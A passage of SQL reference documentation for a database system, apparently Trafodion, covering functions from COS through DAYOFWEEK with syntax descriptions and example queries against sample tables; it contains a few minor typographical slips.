COS\r\n\r\n* This function returns the value 9.39680940386503680E-001, or\r\napproximately 0.9397, the cosine of 0.3491 (which is 20 degrees):\r\n+\r\n```\r\nCOS (0.3491)\r\n```\r\n\r\n<<<\r\n[[cosh_function]]\r\n=== COSH Function\r\n\r\nThe COSH function returns the hyperbolic cosine of a numeric value\r\nexpression, where the expression is an angle expressed in radians.\r\n\r\nCOSH is a {project-name} SQL extension.\r\n\r\n```\r\nCOSH (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the COSH function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_cosh]]\r\n=== Examples of COSH\r\n\r\n* This function returns the value 1.88842387716101568E+000, or\r\napproximately 1.8884, the hyperbolic cosine of 1.25 in radians:\r\n+\r\n```\r\nCOSH (1.25)\r\n```\r\n\r\n<<<\r\n[[count_function]]\r\n=== COUNT Function\r\n\r\nThe COUNT function counts the number of rows that result from a query or\r\nthe number of rows that contain a distinct value in a specific column.\r\nThe result of COUNT is data type LARGEINT. The result can never be NULL.\r\n\r\n```\r\nCOUNT {(*) | ([ALL | DISTINCT] expression)}\r\n```\r\n\r\n* `COUNT (*)`\r\n+\r\nreturns the number of rows in the table specified in the FROM clause of\r\nthe SELECT statement that contains COUNT (\\*). 
If the result table is\r\nempty (that is, no rows are returned by the query) COUNT (*) returns\r\nzero.\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nreturns the number of all rows or the number of distinct rows in the\r\none-column table derived from the evaluation of _expression_. The\r\ndefault option is ALL, which causes duplicate values to be included. If\r\nyou specify DISTINCT, duplicate values are eliminated before the COUNT\r\nfunction is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a value expression that determines the values to count. The\r\n_expression_ cannot contain an aggregate function or a subquery. The\r\nDISTINCT clause specifies that the COUNT function operates on distinct\r\nvalues from the one-column table derived from the evaluation of\r\n_expression_. See <<expressions,Expressions>>.\r\n\r\n[[considerations_for_count]]\r\n=== Considerations for COUNT\r\n\r\n[[operands-of-the-expression-1]]\r\n==== Operands of the Expression\r\n\r\nThe operand of COUNT is either * or an expression that includes columns\r\nfrom the result table specified by the SELECT statement that contains\r\nCOUNT. However, the expression cannot include an aggregate function or a\r\nsubquery. These expressions are valid:\r\n\r\n```\r\nCOUNT (*)\r\nCOUNT (DISTINCT JOBCODE)\r\nCOUNT (UNIT_PRICE * QTY_ORDERED)\r\n```\r\n\r\n<<<\r\n[[count_nulls]]\r\n==== Nulls\r\n\r\nCOUNT is evaluated after eliminating all nulls from the one-column table\r\nspecified by the operand. If the table has no rows, COUNT returns zero.\r\n\r\nCOUNT(\\*) does not eliminate null rows from the table specified in the\r\nFROM clause of the SELECT statement. If all rows in a table are null,\r\nCOUNT(\\*) returns the number of rows in the table.\r\n\r\n[[examples_of_count]]\r\n=== Examples of COUNT\r\n\r\n* Count the number of rows in the EMPLOYEE table:\r\n+\r\n```\r\nSELECT COUNT (*) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 62\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Count the number of employees who have a job code in the EMPLOYEE\r\ntable:\r\n+\r\n```\r\nSELECT COUNT (jobcode) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 56\r\n\r\n--- 1 row(s) selected.\r\n\r\nSELECT COUNT(*)\r\nFROM persnl.employee\r\nWHERE jobcode IS NOT NULL;\r\n\r\n(EXPR)\r\n-----------\r\n 56\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n* Count the number of distinct departments in the EMPLOYEE table:\r\n+\r\n```\r\nSELECT COUNT (DISTINCT deptnum) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 11\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[crc32_function]]\r\n == CRC32 Function\r\n \r\nComputes a cyclic redundancy check value and returns a 32-bit unsigned value. \r\nThe result is NULL if the argument is NULL. The argument is expected to be a \r\nstring and (if possible) is treated as one if it is not.\r\n \r\n```\r\nCRC32{ expression)}\r\n```\r\n \r\n* `_expression_`\r\n+\r\nspecifies a value expression that determines the values to count. The\r\n_expression_ cannot contain an aggregate function or a subquery. 
\r\nSee <<expressions,Expressions>>.\r\n \r\n[[examples_of_crc32]]\r\n=== examples of CR32\r\n```\r\n>>SELECT CRC32('Trafodion') from dual;\r\n \r\n (EXPR)\r\n ----------\r\n \r\n 1960931967\r\n \r\n>>SELECT CRC32(2016) from dual;\r\n \r\n (EXPR)\r\n ----------\r\n \r\n 2177070256\r\n \r\n```\r\n<<<\r\n[[current_function]]\r\n== CURRENT Function\r\n\r\nThe CURRENT function returns a value of type TIMESTAMP based on the\r\ncurrent local date and time.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\nYou can also use <<current_timestamp_function,CURRENT_TIMESTAMP Function>>.\r\n\r\n```\r\nCURRENT [(precision)]\r\n```\r\n\r\n* `_precision_`\r\n+\r\nis an integer value in the range 0 to 6 that specifies the precision of\r\n(the number of decimal places in) the fractional seconds in the returned\r\nvalue. The default is 6.\r\n+\r\nFor example, the function CURRENT (2) returns the current date and time\r\nas a value of data type TIMESTAMP, where the precision of the fractional\r\nseconds is 2, for example, 2008-06-26 09:01:20.89. The value returned is\r\nnot a string value.\r\n\r\n[[examples_of_current]]\r\n=== Examples of CURRENT\r\n\r\n* The PROJECT table contains a column SHIP_TIMESTAMP of data type\r\nTIMESTAMP. Update a row by using the CURRENT value:\r\n+\r\n```\r\nUPDATE persnl.project\r\nSET ship_timestamp = CURRENT WHERE projcode = 1000;\r\n```\r\n\r\n<<<\r\n[[current_date_function]]\r\n== CURRENT_DATE Function\r\n\r\nThe CURRENT_DATE function returns the local current date as a value of\r\ntype DATE.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\n```\r\nCURRENT_DATE\r\n```\r\n\r\nThe CURRENT_DATE function returns the current date, such as 2008-09-28.\r\nThe value returned is a value of type DATE, not a string value.\r\n\r\n[[examples_of_current_date]]\r\n=== Examples of CURRENT_DATE\r\n\r\n* Select rows from the ORDERS table based on the current date:\r\n+\r\n```\r\nSELECT * FROM sales.orders\r\nWHERE deliv_date >= CURRENT_DATE;\r\n```\r\n\r\n* The PROJECT table has a column EST_COMPLETE of type INTERVAL DAY. If\r\nthe current date is the start date of your project, determine the\r\nestimated date of completion:\r\n+\r\n```\r\nSELECT projdesc, CURRENT_DATE + est_complete FROM persnl.project;\r\n\r\nProject\/Description (EXPR)\r\n------------------- ----------\r\nSALT LAKE CITY 2008-01-18\r\nROSS PRODUCTS 2008-02-02\r\nMONTANA TOOLS 2008-03-03\r\nAHAUS TOOL\/SUPPLY 2008-03-03\r\nTHE WORKS 2008-02-02\r\nTHE WORKS 2008-02-02\r\n\r\n--- 6 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[current_time_function]]\r\n== CURRENT_TIME Function\r\n\r\nThe CURRENT_TIME function returns the current local time as a value of\r\ntype TIME.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\n```\r\nCURRENT_TIME [(precision)]\r\n```\r\n\r\n* `_precision_`\r\n+\r\nis an integer value in the range 0 to 6 that specifies the precision of\r\n(the number of decimal places in) the fractional seconds in the returned\r\nvalue. The default is 0.\r\n+\r\nFor example, the function CURRENT_TIME (2) returns the current time as a\r\nvalue of data type TIME, where the precision of the fractional seconds\r\nis 2, for example, 14:01:59.30. 
The value returned is not a string\r\nvalue.\r\n\r\n[[examples_of_current_time]]\r\n=== Examples of CURRENT_TIME\r\n\r\n* Use CURRENT_DATE and CURRENT_TIME as a value in an inserted row:\r\n+\r\n```\r\nINSERT INTO stats.logfile (user_key, run_date, run_time, user_name)\r\nVALUES (001, CURRENT_DATE, CURRENT_TIME, 'JuBrock');\r\n```\r\n\r\n<<<\r\n[[current_timestamp_function]]\r\n== CURRENT_TIMESTAMP Function\r\n\r\nThe CURRENT_TIMESTAMP function returns a value of type TIMESTAMP based\r\non the current local date and time.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\nYou can also use the <<current_function,CURRENT Function>>.\r\n\r\n```\r\nCURRENT_TIMESTAMP [(_precision_)]\r\n```\r\n\r\n* `_precision_`\r\n+\r\nis an integer value in the range 0 to 6 that specifies the precision of\r\n(the number of decimal places in) the fractional seconds in the returned\r\nvalue. The default is 6.\r\n+\r\nFor example, the function CURRENT_TIMESTAMP (2) returns the current date\r\nand time as a value of data type TIMESTAMP, where the precision of the\r\nfractional seconds is 2; for example, 2008-06-26 09:01:20.89. The value\r\nreturned is not a string value.\r\n\r\n\r\n[[examples_of_current_timestamp]]\r\n=== Examples of CURRENT_TIMESTAMP\r\n\r\n* The PROJECT table contains a column SHIP_TIMESTAMP of data type\r\nTIMESTAMP. Update a row by using the CURRENT_TIMESTAMP value:\r\n+\r\n```\r\nUPDATE persnl.project\r\nSET ship_timestamp = CURRENT_TIMESTAMP WHERE projcode = 1000;\r\n```\r\n\r\n<<<\r\n[[current_user_function]]\r\n== CURRENT_USER Function\r\n\r\nThe CURRENT_USER function returns the database user name of the current\r\nuser who invoked the function. The current user is the authenticated\r\nuser who started the session. That database user name is used for\r\nauthorization of SQL statements in the current session.\r\n\r\n```\r\nCURRENT_USER\r\n```\r\n\r\nThe CURRENT_USER function is similar to the <<user_function,USER Function>>.\r\n\r\n[[considerations_for_current_user]]\r\n=== Considerations for CURRENT_USER\r\n\r\n* This function can be specified only in the top level of a SELECT statement.\r\n* The value returned is string data type VARCHAR(128) and is in ISO8859-1 encoding.\r\n\r\n\r\n[[examples_of_current_user]]\r\n=== Examples of CURRENT_USER\r\n\r\n* This example retrieves the database user name for the current user:\r\n+\r\n```\r\nSELECT CURRENT_USER FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-----------------------\r\nTSHAW\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[date_add_function]]\r\n== DATE_ADD Function\r\n\r\nThe DATE_ADD function adds the interval specified by\r\n_interval_expression_ to _datetime_expr_. If the specified interval is\r\nin years or months, DATE_ADD normalizes the result. See\r\n<<standard_normalization,Standard Normalization>>. The type of the\r\n_datetime_expr_ is returned, unless the _interval_expression_ contains\r\nany time components, then a timestamp is returned.\r\n\r\nDATE_ADD is a {project-name} SQL extension.\r\n\r\n```\r\nDATE_ADD (datetime-expr, interval-expression)\r\n```\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `_interval-expression_`\r\n+\r\nis an expression that can be combined in specific ways with addition\r\noperators. 
The _interval_expression_ accepts all interval expression\r\ntypes that the {project-name} database software considers as valid interval\r\nexpressions. See <<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_date_add]]\r\n=== Examples of DATE_ADD\r\n\r\n* This function returns the value DATE '2007-03-07'\r\n+\r\n```\r\nDATE_ADD(DATE '2007-02-28', INTERVAL '7' DAY)\r\n```\r\n\r\n* This function returns the value DATE '2008-03-06'\r\n+\r\n```\r\nDATE_ADD(DATE '2008-02-28', INTERVAL '7' DAY)\r\n```\r\n\r\n* This function returns the timestamp '2008-03-07 00:00:00'\r\n+\r\n```\r\nDATE_ADD(timestamp'2008-02-29 00:00:00', INTERVAL '7' DAY)\r\n```\r\n\r\n* This function returns the timestamp '2008-02-28 23:59:59'\r\n+\r\n```\r\nDATE_ADD(timestamp '2007-02-28 23:59:59', INTERVAL '12' MONTH)\r\n```\r\n+\r\nNOTE: compare this example with the last example under DATE_SUB.\r\n\r\n<<<\r\n[[date_sub_function]]\r\n== DATE_SUB Function\r\n\r\nThe DATE_SUB function subtracts the specified _interval_expression_ from\r\n_datetime_expr_. If the specified interval is in years or months,\r\nDATE_SUB normalizes the result. See <<standard_normalization,Standard Normalization>>.\r\n\r\nThe type of the _datetime_expr_ is returned, unless the _interval_expression_ contains\r\nany time components, then a timestamp is returned.\r\n\r\nDATE_SUB is a {project-name} SQL extension.\r\n\r\n```\r\nDATE_SUB (datetime-expr, interval-expression)\r\n```\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime_Value_Expression>>.\r\n\r\n* `_interval-expression_`\r\n+\r\nis an expression that can be combined in specific ways with subtraction\r\noperators. The _interval_expression_ accepts all interval expression\r\ntypes that the {project-name} database software considers as valid interval\r\nexpressions. see <<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_date_sub]]\r\n=== Examples of DATE_SUB\r\n\r\n* This function returns the value DATE '2009-02-28'\r\n+\r\n```\r\nDATE_SUB(DATE '2009-03-07', INTERVAL'7' DAY)\r\n```\r\n\r\n* This function returns the value DATE '2008-02-29'\r\n+\r\n```\r\nDATE_SUB(DATE '2008-03-07', INTERVAL'7' DAY)\r\n```\r\n\r\n* This function returns the timestamp '2008-02-29 00:00:00'\r\n+\r\n```\r\nDATE_SUB(timestamp '2008-03-31 00:00:00', INTERVAL '31' DAY)\r\n```\r\n\r\n* This function returns the timestamp '2007-02-28 23:59:59'\r\n+\r\n```\r\nDATE_SUB(timestamp '2008-02-29 23:59:59', INTERVAL '12' MONTH)\r\n```\r\n\r\n\r\n<<<\r\n[[dateadd_function]]\r\n== DATEADD Function\r\n\r\nThe DATEADD function adds the interval of time specified by _datepart_\r\nand _num-expr_ to _datetime-expr_. If the specified interval is in\r\nyears or months, DATEADD normalizes the result. See\r\n<<standard_normalization,Standard Normalization>>. 
The type of the\r\n_datetime-expr_ is returned, unless the interval expression contains any\r\ntime components, then a timestamp is returned.\r\n\r\nDATEADD is a {project-name} SQL extension.\r\n\r\n```\r\nDATEADD(datepart, num-expr, datetime-expr)\r\n```\r\n\r\n* `_datepart_`\r\n+\r\nis YEAR, MONTH, DAY, HOUR, MINUTE, SECOND, QUARTER, WEEK, or one of the\r\nfollowing abbreviations:\r\n+\r\n[cols=\"15%,85%\"]\r\n|===\r\n| YEAR | _YY_ and _YYYY_\r\n| MONTH | _M_ and _MM_\r\n| DAY | _D_ and _DD_\r\n| HOUR | _HH_\r\n| MINUTE | _MI_ and _M_\r\n| SECOND | _SS_ and _S_\r\n| QUARTER | _Q_ and _QQ_\r\n| WEEK | _WW_ and _WK_\r\n|===\r\n\r\n\r\n* `_num-expr_`\r\n+\r\nis an SQL exact numeric value expression that specifies how many\r\n_datepart_ units of time are to be added to _datetime_expr_. If\r\n_num_expr_ has a fractional portion, it is ignored. If _num_expr_ is\r\nnegative, the return value precedes _datetime_expr_ by the specified\r\namount of time. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. The type of the _datetime_expression_ is returned, unless the\r\ninterval expression contains any time components, then a timestamp is\r\nreturned. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_dateadd]]\r\n=== Examples of DATEADD\r\n\r\n* This function adds seven days to the date specified in _start_date_\r\n+\r\n```\r\nDATEADD(DAY, 7,start_date)\r\n```\r\n\r\n* This function returns the value DATE '2009-03-07'\r\n+\r\n```\r\nDATEADD(DAY, 7 , DATE '2009-02-28')\r\n```\r\n\r\n* This function returns the value DATE '2008-03-06'\r\n+\r\n```\r\nDATEADD(DAY, 7, DATE '2008-02-28')\r\n```\r\n\r\n* This function returns the timestamp '2008-03-07 00:00:00'\r\n+\r\n```\r\nDATEADD(DAY, 7, timestamp'2008-02-29 00:00:00')\r\n```\r\n\r\n<<<\r\n[[datediff_function]]\r\n== DATEDIFF Function\r\n\r\nThe DATEDIFF function returns the integer value for the number of\r\n_datepart_ units of time between _startdate_ and _enddate_. If\r\n_enddate_ precedes _startdate_, the return value is negative or zero.\r\n\r\nDATEDIFF is a {project-name} SQL extension.\r\n\r\n```\r\nDATEDIFF (datepart, startdate, enddate)\r\n```\r\n\r\n* `datepart`\r\n+\r\nis YEAR, MONTH, DAY, HOUR, MINUTE, SECOND, QUARTER, WEEK, or one of the\r\nfollowing abbreviations:\r\n+\r\n[cols=\"15%,85%\"]\r\n|===\r\n| YEAR | _YY_ and _YYYY_\r\n| MONTH | _M_ and _MM_\r\n| DAY | _D_ and _DD_\r\n| HOUR | _HH_\r\n| MINUTE | _MI_ and _M_\r\n| SECOND | _SS_ and _S_\r\n| QUARTER | _Q_ and QQ\r\n| WEEK | _WW_ and _WK_\r\n|===\r\n\r\n* `startdate`\r\n+\r\nmay be of type DATE or TIMESTAMP.\r\nSee <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `enddate`\r\n+\r\nmay be of type DATE or TIMESTAMP.\r\nSee <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\nThe method of counting crossed boundaries such as days, minutes, and\r\nseconds makes the result given by DATEDIFF consistent across all data\r\ntypes. The result is a signed integer value equal to the number of\r\ndatepart boundaries crossed between the first and second date.\r\n\r\nFor example, the number of weeks between Sunday, January 4, and Sunday,\r\nJanuary 1 , is 1. The number of months between March 31 and April 1\r\nwould be 1 because the month boundary is crossed from March to April.\r\nThe DATEDIFF function generates an error if the result is out of range\r\nfor integer values. 
For seconds, the maximum number is equivalent to\r\napproximately 68 years. The DATEDIFF function generates an error if a\r\ndifference in weeks is requested and one of the two dates precedes\r\nJanuary 7 of the year 0001.\r\n\r\n<<<\r\n[[examples_of_datediff]]\r\n=== Examples of DATEDIFF\r\n\r\n* This function returns the value of 0 because no one-second boundaries\r\nare crossed.\r\n+\r\n```\r\nDATEDIFF( SECOND\r\n , TIMESTAMP '2006-09-12 11:59:58.999998'\r\n , TIMESTAMP '2006-09-12 11:59:58.999999'\r\n )\r\n```\r\n\r\n* This function returns the value 1 because a one-second boundary is\r\ncrossed even though the two timestamps differ by only one microsecond.\r\n+\r\n```\r\nDATEDIFF( SECOND\r\n , TIMESTAMP '2006-09-12 11:59:58.999999'\r\n , TIMESTAMP '2006-09-12 11:59:59.000000'\r\n )\r\n```\r\n\r\n* This function returns the value of 0.\r\n+\r\n```\r\nDATEDIFF( YEAR\r\n , TIMESTAMP '2006-12-31 23:59:59.999998'\r\n , TIMESTAMP '2006-12-31 23:59:59.999999'\r\n )\r\n```\r\n\r\n* This function returns the value of 1 because a year boundary is\r\ncrossed.\r\n+\r\n```\r\nDATEDIFF( YEAR\r\n , TIMESTAMP '2006-12-31 23:59:59.999999'\r\n , TIMESTAMP '2007-01-01 00:00:00.000000'\r\n )\r\n```\r\n\r\n* This function returns the value of 2 because two WEEK boundaries are\r\ncrossed.\r\n+\r\n```\r\nDATEDIFF(WEEK, DATE '2006-01-01', DATE '2006-01-09')\r\n```\r\n\r\n* This function returns the value of -29.\r\n+\r\n```\r\nDATEDIFF(DAY, DATE '2008-03-01', DATE '2008-02-01')\r\n```\r\n\r\n<<<\r\n[[dateformat_function]]\r\n=== DATEFORMAT Function\r\n\r\nThe DATEFORMAT function returns a datetime value as a character string\r\nliteral in the DEFAULT, USA, or EUROPEAN format. The data type of the\r\nresult is CHAR.\r\n\r\nDATEFORMAT is a {project-name} SQL extension.\r\n\r\n```\r\nDATEFORMAT (datetime-expression,{DEFAULT | USA | EUROPEAN})\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE, TIME,\r\nor TIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `DEFAULT | USA | EUROPEAN`\r\n+\r\nspecifies a format for a datetime value. See <<datetime_literals,Datetime Literals>>.\r\n\r\n[[considerations_for_dateformat]]\r\n=== Considerations for DATEFORMAT\r\n\r\nThe DATEFORMAT function returns the datetime value in ISO8859-1\r\nencoding.\r\n\r\n[[examples_of_dateformat]]\r\n=== Examples of DATEFORMAT\r\n\r\n* Convert a datetime literal in DEFAULT format to a string in USA\r\nformat: DATEFORMAT (TIMESTAMP '2008-06-20 14:20:20.00', USA) The\r\nfunction returns this string literal:\r\n+\r\n```\r\n'06\/20\/2008 02:20:20.00 PM'\r\n```\r\n\r\n* Convert a datetime literal in DEFAULT format to a string in European\r\nformat: DATEFORMAT (TIMESTAMP '2008-06-20 14:20:20.00', EUROPEAN) The\r\nfunction returns this string literal:\r\n+\r\n```\r\n'20.06.2008 14.20.20.00'\r\n```\r\n\r\n<<<\r\n[[date_part_function_of_an_interval]]\r\n== DATE_PART Function (of an Interval)\r\n\r\nThe DATE_PART function extracts the datetime field specified by _text_\r\nfrom the _interval_ value specified by _interval_ and returns the result\r\nas an exact numeric value. The DATE_PART function accepts the\r\nspecification of 'YEAR', 'MONTH', 'DAY', 'HOUR', 'MINUTE', or 'SECOND'\r\nfor text.\r\n\r\nDATE_PART is a {project-name} SQL extension.\r\n\r\n```\r\nDATEPART (text, interval)\r\n```\r\n\r\n* `_text_`\r\n+\r\nspecifies YEAR, MONTH, DAY, HOUR, MINUTE, or SECOND. 
The value must be\r\nenclosed in single quotes.\r\n\r\n* `_interval_`\r\n+\r\n_interval_ accepts all interval expression types that the {project-name}\r\ndatabase software considers as valid interval expressions. See\r\n<<interval_value_expressions,Interval Value Expressions>>.\r\n\r\nThe DATE_PART(_text_, _interval_) is equivalent to EXTRACT(_text_,\r\n_interval_), except that the DATE_PART function requires single quotes\r\naround the text specification, where EXTRACT does not allow single\r\nquotes.\r\n\r\nWhen SECOND is specified the fractional part of the second is returned.\r\n\r\n[[examples_of_date_part]]\r\n=== Examples of DATE_PART\r\n\r\n* This function returns the value of 7.\r\n+\r\n```\r\nDATE_PART('DAY', INTERVAL '07:04' DAY TO HOUR)\r\n```\r\n\r\n* This function returns the value of 6.\r\n+\r\n```\r\nDATE_PART('MONTH', INTERVAL '6' MONTH)\r\n```\r\n\r\n* This function returns the value of 36.33.\r\n+\r\n```\r\nDATE_PART('SECOND', INTERVAL '5:2:15:36.33' DAY TO SECOND(2))\r\n```\r\n\r\n<<<\r\n[[date_part_function_of_a_timestamp]]\r\n== DATE_PART Function (of a Timestamp)\r\n\r\nThe DATE_PART function extracts the datetime field specified by _text_\r\nfrom the datetime value specified by _datetime_expr_ and returns the\r\nresult as an exact numeric value. The DATE_PART function accepts the\r\nspecification of 'YEAR', 'YEARQUARTER', 'YEARMONTH', 'YEARWEEK',\r\n'MONTH', 'DAY', 'HOUR', 'MINUTE', or 'SECOND' for text.\r\n\r\nThe DATE_PART function of a timestamp can be changed to DATE_PART\r\nfunction of a datetime because the second argument can be either a\r\ntimestamp or a date expression.\r\n\r\nDATE_PART is a {project-name} extension.\r\n\r\n```\r\nDATEPART(text, datetime-expr)\r\n```\r\n\r\n* `_text_`\r\n+\r\nspecifies YEAR, YEARQUARTER, YEARMONTH, YEARWEEK, MONTH, DAY, HOUR,\r\nMINUTE, or SECOND. The value must be enclosed in single quotes.\r\n\r\n** *YEARMONTH*: Extracts the year and the month, as a 6-digit integer of\r\nthe form yyyymm (100 \\* year + month).\r\n** *YEARQUARTER*: Extracts the year and quarter, as a 5-digit integer of\r\nthe form yyyyq, (10 \\* year + quarter) with q being 1 for the first\r\nquarter, 2 for the second, and so on.\r\n** *YEARWEEK*: Extracts the year and week of the year, as a 6-digit integer\r\nof the form yyyyww (100 \\* year + week). The week number will be computed\r\nin the same way as in the WEEK function.\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\nDATE_PART(_text_, _datetime-expr_) is mostly equivalent to\r\nEXTRACT(_text_, _datetime-expr_), except that DATE_PART requires\r\nsingle quotes around the text specification where EXTRACT does not allow\r\nsingle quotes. 
In addition, you cannot use the YEARQUARTER, YEARMONTH,\r\nand YEARWEEK text specification with EXTRACT.\r\n\r\n<<<\r\n[[examples_of_date_part]]\r\n=== Examples of DATE_PART\r\n\r\n* This function returns the value of 12.\r\n+\r\n```\r\nDATE_PART('month', date'12\/05\/2006')\r\n```\r\n\r\n* This function returns the value of 2006.\r\n+\r\n```\r\nDATE_PART('year', date'12\/05\/2006')\r\n```\r\n\r\n* This function returns the value of 31.\r\n+\r\n```\r\nDATE_PART('day', TIMESTAMP '2006-12-31 11:59:59.999999')\r\n```\r\n\r\n* This function returns the value 201 07.\r\n+\r\n```\r\nDATE_PART('YEARMONTH', date '2011-07-25')\r\n```\r\n\r\n<<<\r\n[[date_trunc_function]]\r\n== DATE_TRUNC Function\r\n\r\nThe DATE_TRUNC function returns a value of type TIMESTAMP, which has all\r\nfields of lesser precision than _text_ set to zero (or 1 in the case of\r\nmonths or days).\r\n\r\nDATE_TRUNC is a {project-name} SQL extension.\r\n\r\n```\r\nDATE_TRUNC(text, datetime-expr)\r\n```\r\n\r\n* `_text_`\r\n+\r\nspecifies 'YEAR', 'MONTH', 'DAY', 'HOUR', 'MINUTE', or 'SECOND'. The\r\nDATE_TRUNC function also accepts the specification of 'CENTURY' or 'DECADE'.\r\n\r\n* `_datetime_expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. DATE_TRUNC returns a value of type TIMESTAMP which has all\r\nfields of lesser precision than _text_ set to zero (or 1 in the case of\r\nmonths or days). See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_date_trunc]]\r\n=== Examples of DATE_TRUNC\r\n\r\n* This function returns the value of TIMESTAMP '2006-12-31 00:00:00'.\r\n+\r\n```\r\nDATE_TRUNC('day', TIMESTAMP '2006-12-31 11:59:59')\r\n```\r\n\r\n* This function returns the value of TIMESTAMP '2006-01-01 00:00:00'\r\n+\r\n```\r\nDATE_TRUNC('YEAR', TIMESTAMP '2006-12-31 11:59:59')\r\n```\r\n\r\n* This function returns the value of TIMESTAMP '2006-12-01 00:00:00'\r\n+\r\n```\r\nDATE_TRUNC('MONTH', DATE '2006-12-31')\r\n```\r\n\r\nRestrictions:\r\n\r\n* DATE_TRUNC( 'DECADE', …) cannot be used on years less than 10.\r\n* DATE_TRUNC( 'CENTURY', …) cannot be used on years less than 100.\r\n\r\n<<<\r\n[[day_function]]\r\n== DAY Function\r\n\r\nThe DAY function converts a DATE or TIMESTAMP expression into an INTEGER\r\nvalue in the range 1 through 31 that represents the corresponding day of\r\nthe month. The result returned by the DAY function is equal to the\r\nresult returned by the DAYOFMONTH function.\r\n\r\nDAY is a {project-name} SQL extension.\r\n\r\n```\r\nDAY (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. 
\r\n\r\n[[examples_of_day]]\r\n=== Examples of DAY\r\n\r\n* Return an integer that represents the day of the month from the\r\nstart date column of the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAY(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 10\r\n```\r\n\r\n<<<\r\n[[dayname_function]]\r\n== DAYNAME Function\r\n\r\nThe DAYNAME function converts a DATE or TIMESTAMP expression into a\r\ncharacter literal that is the name of the day of the week (Sunday,\r\nMonday, and so on).\r\n\r\nDAYNAME is a {project-name} SQL extension.\r\n\r\n```\r\nDAYNAME (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[considerations_for_dayname]]\r\n=== Considerations for DAYNAME\r\n\r\nThe DAYNAME function returns the name of the day in ISO8859-1.\r\n\r\n[[examples_of_dayname]]\r\n=== Examples of DAYNAME\r\n\r\n* Return the name of the day of the week from the start date column in the\r\nproject table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAYNAME(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ---------\r\n2008-04-10 2008-04-21 08:15:00.000000 Thursday\r\n```\r\n\r\n<<<\r\n[[dayofmonth_function]]\r\n== DAYOFMONTH Function\r\n\r\nThe DAYOFMONTH function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 31 that represents the\r\ncorresponding day of the month. The result returned by the DAYOFMONTH\r\nfunction is equal to the result returned by the DAY function.\r\n\r\nDAYOFMONTH is a {project-name} SQL extension.\r\n\r\n```\r\nDAYOFMONTH (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_dayofmonth]]\r\n=== Examples of DAYOFMONTH\r\n\r\n* Return an integer that represents the day of the month from the\r\nstart date column of the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAYOFMONTH(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 10\r\n```\r\n\r\n<<<\r\n[[dayofweek_function]]\r\n== DAYOFWEEK Function\r\n\r\nThe DAYOFWEEK function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 7 that represents the corresponding\r\nday of the week. The value 1 represents Sunday, 2 represents Monday, 